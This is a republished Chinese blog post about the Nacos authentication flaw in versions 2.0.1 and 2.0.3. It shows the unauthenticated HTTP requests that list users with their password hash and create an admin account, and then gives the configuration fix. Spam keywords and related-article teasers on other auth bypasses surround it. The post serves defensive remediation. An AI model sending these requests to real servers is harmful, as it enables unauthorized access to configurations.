国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Nacos身份認(rèn)證漏洞

這篇具有很好參考價(jià)值的文章主要介紹了Nacos身份認(rèn)證漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

背景

公司Nacos版本有用的2.0.1和2.0.3的都復(fù)現(xiàn)了身份認(rèn)證的漏洞,無(wú)需認(rèn)證身份就可以查看用戶列表以及注冊(cè)新用戶,并且注冊(cè)上來(lái)的新用戶可以查看所有public命名空間下的配置資源!

漏洞復(fù)現(xiàn)

1、查看用戶列表
  • URL:http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=1
  • 方法類型:GET
  • 返回結(jié)果:
{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$gZoOI701ByEP8LatzrVyneAf4zoYAyLoCrrlegCeYkFbqgtaoBIQ."}]}

如圖示:
Nacos身份認(rèn)證漏洞

2、用戶注冊(cè)

無(wú)需任何用戶憑證即可新建用戶,例如這里我新建admin/123456用戶。

  • URL:http://ip:8848/nacos/v1/auth/users?username=admin&password=123456
  • 方法類型:POST
  • 返回結(jié)果:
{
    "code": 200,
    "message": null,
    "data": "create user ok!"
}

postman測(cè)試截圖:
Nacos身份認(rèn)證漏洞
可以看到提示創(chuàng)建用戶成功。使用賬號(hào)登錄可以看到所有public命名空間下的配置資源,這里登錄截圖就不貼出來(lái)了,大家可以自己去測(cè)試。

整改措施

通過(guò)檢索,發(fā)現(xiàn)修改nacos的application.properties的配置可以解決這個(gè)問(wèn)題,需要修改的配置內(nèi)容如下:

#修改配置文件application.properties,修改以下三項(xiàng):
① 將nacos.core.auth.enabled=false改為true
② 將nacos.core.auth.enable.userAgentAuthWhite=true 改為false
③ nacos.core.auth.server.identity.key=自定義的值
  nacos.core.auth.server.identity.value=自定義的值
#重啟nacos:
systemctl restart nacos

經(jīng)過(guò)實(shí)踐,第三點(diǎn)自定義的值可以自己定義,和我們需要注冊(cè)上nacos的服務(wù)配置沒(méi)有關(guān)聯(lián)。修改完上面配置后,再次嘗試上述兩個(gè)漏洞得到下列返回:
Nacos身份認(rèn)證漏洞
可以看到獲取用戶列表接口被禁止了。
Nacos身份認(rèn)證漏洞
可以看到新建用戶接口也被禁止了。使用admin/123456登錄系統(tǒng):
Nacos身份認(rèn)證漏洞
此時(shí)admin用戶已經(jīng)沒(méi)有權(quán)限查看public命名空間的配置資源了。至此nacos此次的認(rèn)證漏洞算是告一段落了。

奇怪的是漏洞問(wèn)題最早是2020年12月份發(fā)現(xiàn)的,網(wǎng)上博客對(duì)于這個(gè)漏洞的集中爆發(fā)討論在21年,這2022年都快過(guò)完了沒(méi)想到團(tuán)隊(duì)才發(fā)現(xiàn)這個(gè)漏洞!

道友可以在博客下方留言互相探討學(xué)習(xí)或者關(guān)注公眾號(hào)fairy with you了解更多,歡迎來(lái)撩!

Nacos身份認(rèn)證漏洞文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-409210.html

注:本博客僅用于交流學(xué)習(xí),不用于任何商業(yè)用途,歡迎思維碰撞。

到了這里,關(guān)于Nacos身份認(rèn)證漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • NACOS身份認(rèn)證繞過(guò)

    NACOS身份認(rèn)證繞過(guò)

    一、漏洞描述 Nacos是Alibaba的一個(gè)動(dòng)態(tài)服務(wù)發(fā)現(xiàn)、配置和服務(wù)管理平臺(tái)。攻擊者通過(guò)添加Nacos-Server的User-Agent頭部將可繞過(guò)(nacos.core.auth.enabled=true)鑒權(quán)認(rèn)證,從而進(jìn)行API操作。 二、漏洞利用 訪問(wèn) http://xxxxx/nacos/v1/auth/users?username=testpassword=test ,并使用burpsuite進(jìn)行抓包,將方法

    2024年02月16日
    瀏覽(26)
  • Smartbi 身份認(rèn)證繞過(guò)漏洞

    因?yàn)樽约捍罱ǖ沫h(huán)境存在一些問(wèn)題,可能是版本過(guò)高的原因,(奇奇怪怪的問(wèn)題,用戶沒(méi)有權(quán)限),所以目前僅僅做概念性驗(yàn)證,對(duì)漏洞的原理進(jìn)行分析。 在未登錄的情況下訪問(wèn)接口? /smartbi/vision/RMIServlet ? 我們可以比較明顯的看到對(duì)應(yīng)的處理類? CheckIsLoggedFilter ? smartbi.fre

    2024年02月16日
    瀏覽(22)
  • 【漏洞復(fù)現(xiàn)-通達(dá)OA】通達(dá)OA share身份認(rèn)證繞過(guò)漏洞

    【漏洞復(fù)現(xiàn)-通達(dá)OA】通達(dá)OA share身份認(rèn)證繞過(guò)漏洞

    通達(dá)OA(Office Anywhere網(wǎng)絡(luò)智能辦公系統(tǒng))是中國(guó)通達(dá)公司的一套協(xié)同辦公自動(dòng)化軟件。通達(dá)OA /share/handle.php存在一個(gè)認(rèn)證繞過(guò)漏洞,利用該漏洞可以實(shí)現(xiàn)任意用戶登錄。攻擊者可以通過(guò)構(gòu)造惡意攻擊代碼,成功登錄系統(tǒng)管理員賬戶,繼而在系統(tǒng)后臺(tái)上傳惡意文件控制網(wǎng)站服務(wù)器

    2024年02月19日
    瀏覽(70)
  • 【嚴(yán)重】Grafana Azure AD環(huán)境身份認(rèn)證繞過(guò)漏洞

    【嚴(yán)重】Grafana Azure AD環(huán)境身份認(rèn)證繞過(guò)漏洞

    ?Grafana 是一個(gè)跨平臺(tái)、開(kāi)源的數(shù)據(jù)可視化網(wǎng)絡(luò)應(yīng)用平臺(tái)。Azure AD 是由微軟提供的一種云身份驗(yàn)證和訪問(wèn)管理服務(wù)。 在 Azure AD 中,多個(gè)用戶可以擁有相同的電子郵件地址。攻擊者可以創(chuàng)建一個(gè)與目標(biāo) Grafana 賬戶相同的電子郵件地址的惡意帳戶,并且在 Azure AD 中配置支持多租戶

    2024年02月17日
    瀏覽(24)
  • Apache Superset 身份認(rèn)證繞過(guò)漏洞(CVE-2023-27524)

    Apache Superset是一個(gè)開(kāi)源的數(shù)據(jù)可視化和數(shù)據(jù)探測(cè)平臺(tái),它基于Python構(gòu)建,使用了一些類似于Django和Flask的Python web框架。提供了一個(gè)用戶友好的界面,可以輕松地創(chuàng)建和共享儀表板、查詢和可視化數(shù)據(jù),也可以集成到其他應(yīng)用程序中。由于用戶在默認(rèn)安裝過(guò)程中,未對(duì)SECRET_KE

    2024年02月09日
    瀏覽(40)
  • CVE-2023-27524 Apache Superset 身份認(rèn)證繞過(guò)漏洞

    CVE-2023-27524 Apache Superset 身份認(rèn)證繞過(guò)漏洞

    Apache Superset是一個(gè)開(kāi)源的數(shù)據(jù)可視化和數(shù)據(jù)探測(cè)平臺(tái),它基于Python構(gòu)建,使用了一些類似于Django和Flask的Python web框架。提供了一個(gè)用戶友好的界面,可以輕松地創(chuàng)建和共享儀表板、查詢和可視化數(shù)據(jù),也可以集成到其他應(yīng)用程序中。由于用戶在默認(rèn)安裝過(guò)程中,未對(duì)SECRET_KE

    2024年02月10日
    瀏覽(25)
  • 【burpsuite安全練兵場(chǎng)-服務(wù)端2】身份認(rèn)證漏洞-16個(gè)實(shí)驗(yàn)(全)

    【burpsuite安全練兵場(chǎng)-服務(wù)端2】身份認(rèn)證漏洞-16個(gè)實(shí)驗(yàn)(全)

    ?? 博主:網(wǎng)絡(luò)安全領(lǐng)域狂熱愛(ài)好者(承諾在CSDN永久無(wú)償分享文章)。 殊榮:CSDN網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者,2022年雙十一業(yè)務(wù)安全保衛(wèi)戰(zhàn)-某廠第一名,某廠特邀數(shù)字業(yè)務(wù)安全研究員,edusrc高白帽,vulfocus、攻防世界等平臺(tái)排名100+、高校漏洞證書(shū)、cnvd原創(chuàng)漏洞證書(shū)等。 擅長(zhǎng):

    2024年02月03日
    瀏覽(23)
  • 統(tǒng)一身份認(rèn)證,構(gòu)建數(shù)字時(shí)代的安全壁壘——統(tǒng)一身份認(rèn)證介紹、原理和實(shí)現(xiàn)方法

    隨著數(shù)字化時(shí)代的來(lái)臨,個(gè)人和機(jī)構(gòu)在互聯(lián)網(wǎng)上的活動(dòng)越來(lái)越頻繁,對(duì)于身份認(rèn)證的需求也愈發(fā)迫切。為了有效應(yīng)對(duì)身份欺詐、數(shù)據(jù)泄露等問(wèn)題,統(tǒng)一身份認(rèn)證(Unified Identity Authentication)應(yīng)運(yùn)而生。 在本文博主將介紹統(tǒng)一身份認(rèn)證的概念、原理以及其具體的實(shí)現(xiàn)方案。 統(tǒng)一

    2024年02月03日
    瀏覽(28)
  • 身份認(rèn)證——802.1x認(rèn)證和MAC認(rèn)證講解

    身份認(rèn)證——802.1x認(rèn)證和MAC認(rèn)證講解

    目錄 802.1x基礎(chǔ) EAP(Extensible Authentication Protocol)可擴(kuò)展認(rèn)證協(xié)議 EAPoL(EAP over LAN)局域網(wǎng)可擴(kuò)展認(rèn)證協(xié)議 802.1x體系架構(gòu) 受控端口的受控方式 802.1x認(rèn)證 802.1x認(rèn)證觸發(fā)方式 客戶端退出認(rèn)證 802.1x認(rèn)證方式 MAC認(rèn)證 802.1x認(rèn)證又稱為EAPOE(Extensible Authentication Protocol Over Ethernet)認(rèn)證

    2024年02月03日
    瀏覽(48)
  • 鑒權(quán)與身份認(rèn)證

    ? 所謂鑒權(quán)就是 身份認(rèn)證 ,就是驗(yàn)證您是否有權(quán)限從服務(wù)器訪問(wèn)或操作相關(guān)數(shù)據(jù)。通俗的講就是一個(gè)門禁,您想要進(jìn)入室內(nèi),必須通過(guò)門禁驗(yàn)證身份,這就是鑒權(quán),如打開(kāi)一個(gè)網(wǎng)站必須要輸入用戶名和密碼才可以登錄進(jìn)入,這種就是鑒權(quán),還有一些業(yè)務(wù)需要登錄以后才可以

    2024年03月14日
    瀏覽(30)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包